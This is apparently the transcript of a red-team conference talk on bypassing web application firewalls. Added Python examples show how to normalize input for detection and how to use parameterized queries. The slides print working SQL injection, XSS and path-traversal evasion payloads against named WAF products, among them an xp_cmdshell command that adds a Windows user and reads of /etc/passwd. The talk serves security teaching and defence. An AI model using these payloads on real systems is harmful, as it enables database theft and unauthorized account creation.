web application firewall: suckseed or succeed
DESCRIPTION
Breach WAF with advanced techniques
TRANSCRIPT
Web Application Firewall (WAF): Suckseed or Succeed !?
Mr. Prathan Phongthiproek, Consulting Manager, Red Team, ACIS Professional Center
Who am I ?
ACIS Professional Center
Manager of the Red Team
Specializing in Attack & Penetration
Information Security Consulting Manager
Instructor and Speaker
Founder of CWH Underground Hacker
Aka 0x7a657133756c
Let’s Reveal
Introduction to Web Application Firewall (WAF)
Breach it !! Filter Evasion
HTTP Parameter Contamination
HTTP Pollution: Split and Join
Conclusion
Introduction to Web Application Firewall (WAF)
Web Application Hacking
7 of 10 sites are vulnerable
70% of Cyber attacks are on web ports
95% of companies are hacked through web ports
Anonymous and Lulzsec
Hackers with Operation #AntiSec
Web Application Hacking
Top 3 Web App Attacks
Cross Site Scripting
File Inclusion (Remote/Local)
SQL Injection (Normal/Blind/Time based/Regex...)
Misunderstandings about hardening web applications
What’s WAF ?
Emerged from IDS/IPS, focused on the HTTP protocol and HTTP-related attacks
Usually contains a lot of complex reg-exp rules to match (blacklist)
For most WAF vendors these rules are “closely guarded secrets”
Open-source WAFs (ModSecurity and PHPIDS) have open-source rules
Understand Blacklist
Detection and Protection
SQL Injection
Cross Site Scripting
Local and Remote File Inclusion
Code/Command Injection
Directory Traversal
Buffer Overflow
Cookie Poisoning
Parameter Tampering
Upload File Mis-Handling
Information Disclosure
Etc...
WAF Vendors
Armorize
Barracuda
Cisco ACE
Citrix Netscaler
F5
Imperva SecureSphere
Radware Appwall
Profense
Bee-ware
BinarySec
Mod Security
WebKnight
DenyAll
Fortify
Visonys
Pentasecurity
Other..
WAF implementation
Breach it !! (CMS and WAFs)
“Under control, under control...... it has burst”
Filter Evasion (SQLi)
PHP: Magic_quote On, Mysql_real_escape_string, Addslashes
' " -> \' \"
id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'
Filter Evasion (SQLi)
PHP: Magic_quote On, Mysql_real_escape_string, Addslashes
' " -> \' \"
id=1 and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273
Filter Evasion (SQLi)
PHP: Magic_quote On, Mysql_real_escape_string, Addslashes
String encoded as ASCII codes with CHAR()
id=1 and 1=2 union select 1,load_file(CHAR(47,118,97,114,47,119,119,119,47,104,116,109,108,47,99,111,110,102,105,103,47,99,111,110,102,105,103,46,105,110,99,46,112,104,112))
Filter Evasion (SQLi)
Comments: //, --, /**/, /*, #, %00
id=1+un/**/ion+se/**/lect+1,2,3--
Case Changing (lower-case rule)
/union\sselect/g
id=1+UnIoN/**/SeLecT/**/1,2,3--
Replaced keywords
id=1+UnunionIoN+SeselectLecT+1,2,3--
Filter Evasion (SQLi)
Case Study: NukeSentinel (PHP Nuke)
Encode to Hex
Forbidden: http://victim.com/php-nuke/?/**/union/**/select.......
Bypass: http://victim.com/php-nuke/?/%2A%2A/union/%2A%2A/select.......
Bypass: http://victim.com/php-nuke/?%2F**%2Funion%2F**%2Fselect.......
Filter Evasion (SQLi)
Buffer Overflow (for C-language filters)
id=1+and+(select 1)=(Select 0x41414141414141414141414141414141.....)+UnIoN+SeLecT+1,version(),3,database(),user(),6,7,8,9,10--
Filter Evasion (SQLi)
Inline Comments (/*!......*/)
A lot of WAFs were bypassed
Bypasses IPS and timeouts
MySQL only (http://dev.mysql.com/doc/refman/5.0/en/comments.html)
/union\sselect/ig
id=1/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
Filter Evasion (SQLi): Inline Comments (/*!......*/), censored screenshot
Other Bypasses:
and -> &&
or -> ||
= -> like
substring() -> substr(), mid(), strcmp()
ascii() -> hex(), bin(), char(), ord()
benchmark() -> sleep()
Whitespace -> (),/**/,%0b
isnull, between
Filter Evasion (SQLi)
Case Study: PHPIDS
Filter Evasion (SQLi)
Case Study: Mod Security CRS
SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "\bunion\b.{1,100}?\bselect\b" \
"phase:2,rev:'2.2.1',capture,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,t:replaceComments,t:compressWhiteSpace,ctl:auditLogParts=+E,block,msg:'SQL Injection Attack',id:'959047',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{tx.0}"
Filter Evasion (SQLi)
Case Study: Mod Security CRS
http://victim.com/news.php?id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user
0 div 1 union#foo*/*barselect#foo1,2,current_user
0 div 1 union select 1,2,current_user
Filter Evasion
Cross Site Scripting (XSS)
Forbidden: http://victim.com/search.php?q=javascript:alert('XSS')
Bypass: http://victim.com/search.php?q=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4=
File Inclusion
Forbidden: http://victim.com/download.php?file=../../../etc/passwd
Bypass: http://victim.com/download.php?file=../../../etc/passwd..........
Bypass: http://victim.com/download.php?file=../../../foo/../etc/bar/../passwd
HTTP Parameter Contamination
Bypass Mod_Security SQLi rule (modsecurity_crs_41)
Bypass URLScan 3.1 DenyQueryStringSequences rules
Bypass AQTRONIX Webknight WAF with “%”
HTTP Parameter Contamination
Case Study: AQTRONIX Webknight
http://victim.com/news.asp?id=10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables)
10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables)
10 and 1=0/(select top 1 table_name from information_schema.tables)
HTTP Pollution: Split and Join
HPP is a simple but effective hacking technique
HPP attacks can be defined as the feasibility to override or add HTTP GET/POST parameters by injecting query-string delimiters
Focus on ASP/ASP.NET
A lot of WAFs were bypassed
HTTP Pollution: Split and Join
Basic Attack
Forbidden: http://victim.com/search.aspx?q=select name,password from user
Bypass: http://victim.com/search.aspx?q=select name&q=password from user
q=select name
q=password from user
q=select name,password from user
HTTP Pollution: Split and Join
HPP + Inline Comment (Bypass Commercial WAF)
Forbidden: http://victim.com/search.aspx?q=select name,password from user
Bypass: http://victim.com/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/user
q=select/*
q=*/name
q=password/*
q=*/from/*
q=*/user
q=select/*,*/name,password/*,*/from/*,*/user
q=select name,password from user
HTTP Pollution: Split and Join
Case study: IBM Web Application Firewall (2011-6-21)
Forbidden: http://victim.com/news.aspx?id=1'; EXEC master..xp_cmdshell "net user lucifer UrWaFisShiT /add" --
Bypass: http://victim.com/news.aspx?id=1'; /*&id=1*/ EXEC /*&id=1*/ master..xp_cmdshell /*&id=1*/ "net user lucifer UrWaFisShiT" /*&id=1*/ --
id=1'; /*
id=1*/ EXEC /*
id=1*/ master..xp_cmdshell /*
id=1*/ "net user lucifer UrWaFisShiT" /*
id=1*/ --
id=1'; /*,1*/ EXEC /*,1*/ master..xp_cmdshell /*,1*/ "net user lucifer UrWaFisShiT" /*,1*/ --
id=1'; EXEC master..xp_cmdshell "net user lucifer UrWaFisShiT" --
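The slides above show the same defensive lesson several times: the WAF inspected a form of the input that the backend never executed (comments left in place, mixed case, a `#` comment hiding a newline, each polluted fragment checked on its own, a stray `%` the backend silently dropped). The following is an added example, not code from the talk or from any WAF product, of a detector that first rebuilds the value the way the backend will see it and only then matches signatures. It uses Python's `parse_qs` to emulate the ASP.NET concatenation of repeated parameters with `,` shown on the Split and Join slides; the `%`-dropping step is an assumption that emulates only what the WebKnight slide shows. The sample query strings are the ones printed on the slides.

```python
import re
from urllib.parse import parse_qs

# Comment forms used in the talk's payloads, consumed left to right the way a
# SQL lexer would. A MySQL "executable" comment /*!...*/ keeps its body because
# the server runs it; every other comment becomes one space (a comment is a
# token separator, so "union/**/select" really is two words).
_COMMENT_RE = re.compile(
    r"/\*!(?P<inline>.*?)\*/"      # MySQL executable comment, body is live SQL
    r"|/\*.*?\*/"                  # ordinary block comment
    r"|#[^\r\n]*"                  # MySQL hash comment, runs to end of line
    r"|--(?:[ \t][^\r\n]*|$)",     # dash comment: needs a following blank or EOL
    re.S | re.M,
)


def strip_comments(sql: str) -> str:
    def repl(m):
        inner = m.group("inline")
        return f" {inner} " if inner is not None else " "
    return _COMMENT_RE.sub(repl, sql)


def normalize_sql(value: str) -> str:
    """Canonical form of an already URL-decoded value: comments resolved,
    lower-cased, whitespace (including the CR/LF trick) collapsed."""
    return re.sub(r"\s+", " ", strip_comments(value).lower()).strip()


# Signatures in the spirit of CRS rule 959047, applied to the normalized text.
SIGNATURES = {
    "union-select": re.compile(r"\bunion\b.{1,100}?\bselect\b"),
    "select-from": re.compile(r"\bselect\b.{1,100}?\bfrom\b"),
    "xp_cmdshell": re.compile(r"\bxp_cmdshell\b"),
}


def decontaminate(query_string: str) -> str:
    """Assumption: emulates the backend on the WebKnight slide, which drops a
    lone '%' ("sel%ect" -> "select"). Applied before decoding, so this mode is
    only meant for backends that behave that way."""
    return query_string.replace("%", "")


def join_polluted(query_string: str) -> dict:
    """Rebuild each parameter the way the talk's ASP.NET target does: repeated
    names are concatenated with ','. Inspecting this joined value instead of
    each fragment alone is what defeats the split-and-join trick."""
    params = parse_qs(query_string, keep_blank_values=True)
    return {name: ",".join(values) for name, values in params.items()}


def inspect(query_string: str, asp_contamination: bool = False) -> list:
    """Return the sorted signature names that fire on the backend-view of the
    request; an empty list means nothing matched."""
    if asp_contamination:
        query_string = decontaminate(query_string)
    hits = set()
    for value in join_polluted(query_string).values():
        text = normalize_sql(value)
        hits.update(name for name, pat in SIGNATURES.items() if pat.search(text))
    return sorted(hits)


if __name__ == "__main__":
    # Constructed inputs: the query strings printed on the slides.
    samples = [
        "id=1+UnIoN/**/SeLecT/**/1,2,3--",
        "id=0+div+1+union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1%2C2%2Ccurrent_user",
        "q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/user",
    ]
    for qs in samples:
        print(qs, "->", inspect(qs))
    webknight = "id=10 an%d 1=0/(sel%ect top 1 tab%le_name fr%om inform%ation_schema.tables)"
    print(webknight, "->", inspect(webknight, asp_contamination=True))
```

The order of the steps is the point: decode, rebuild the parameter as the backend will, resolve comments as the database will, and match last. A rule that matches on the raw fragment (or, as in the CRS example, removes comments without honouring `#` to end-of-line) is checking text the server never runs.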
“Thailand needs change. It is time for everyone in the country to wake up. Ignorance must come to an end.”
How to protect your website ?
Implement Secure Software Development Life Cycle (SSDLC)
Secure Coding: Validate all inputs and outputs
Pentest before Online
Harden it !!
Re-visit Again
Deploy WAF (Optional)
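The first Filter Evasion slides make the case for the "Secure Coding" item above: `addslashes`/`magic_quotes` escape quote characters, but the `id` parameter is numeric and unquoted, so a payload that needs no quotes (the hex-encoded `0x7573657273` form) passes through escaping untouched. The following is an added example, not code from the talk, written in Python with SQLite standing in for the MySQL backend; the `users` table and its rows are constructed sample data. It places the quote-escaping pattern next to the two controls that actually close the hole: type validation and parameter binding.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the talk's 'users' table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "hash-a"), (2, "bob", "hash-b")],
    )
    return conn


def escape_quotes(value: str) -> str:
    """Emulates addslashes()/magic_quotes: only quotes and backslashes change."""
    return (
        value.replace("\\", "\\\\")
        .replace("'", "\\'")
        .replace('"', '\\"')
    )


def build_query_escaped(raw_id: str) -> str:
    """The 'before' pattern: escape, then concatenate into an unquoted numeric
    context. Returned rather than executed, so the reader can see that a
    quote-free payload reaches the database exactly as it was sent."""
    return "SELECT username FROM users WHERE id=" + escape_quotes(raw_id)


def is_valid_id(raw_id: str) -> bool:
    """Positive whitelist: an id is a string of decimal digits, nothing else."""
    return raw_id.isdigit()


def lookup_user(conn: sqlite3.Connection, raw_id: str):
    """Hardened: validate the type, then bind the value as a parameter."""
    if not is_valid_id(raw_id):
        raise ValueError("id must be a non-negative integer")
    row = conn.execute(
        "SELECT username FROM users WHERE id = ?", (int(raw_id),)
    ).fetchone()
    return row[0] if row else None


def lookup_user_bound_only(conn: sqlite3.Connection, raw_id: str):
    """Binding without validation: the whole string is one value, never SQL,
    so even the raw payload just fails to match any row."""
    row = conn.execute(
        "SELECT username FROM users WHERE id = ?", (raw_id,)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    # Constructed input: the hex-encoded payload from the slides.
    payload = ("1 and 1=2 union select 1,group_concat(column_name) "
               "from information_schema.columns where table_name=0x7573657273")
    print("escaping changed the payload:", escape_quotes(payload) != payload)
    print(build_query_escaped(payload))
    conn = make_db()
    print("valid id:", lookup_user(conn, "1"))
    print("bound payload:", lookup_user_bound_only(conn, payload))
```

Validation is what keeps the numeric parameter numeric; binding is what keeps a value from ever being parsed as SQL. Either one alone stops this payload, and neither depends on a WAF rule keeping pace with the next encoding trick.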
Conclusion
WAF is not the long-expected
Because of its functional limitations, a WAF is not able to protect a web app from all possible vulnerabilities
It is necessary to adapt the WAF filter to the particular web app being protected
A WAF doesn’t eliminate a vulnerability; it just partly screens the attack vector
It suckseed or succeed !?
“Security products are not able to 100% protect from the damn config/coding of an admin. It just needs time and imagination to breach it !!”
Greetz To..
ACIS-Red Team
Kyle
Johannes Dahse
Ahmad Maulana
Luca Carettoni
Stefano di Paola
Ivan Markovic
All WAF products that I breached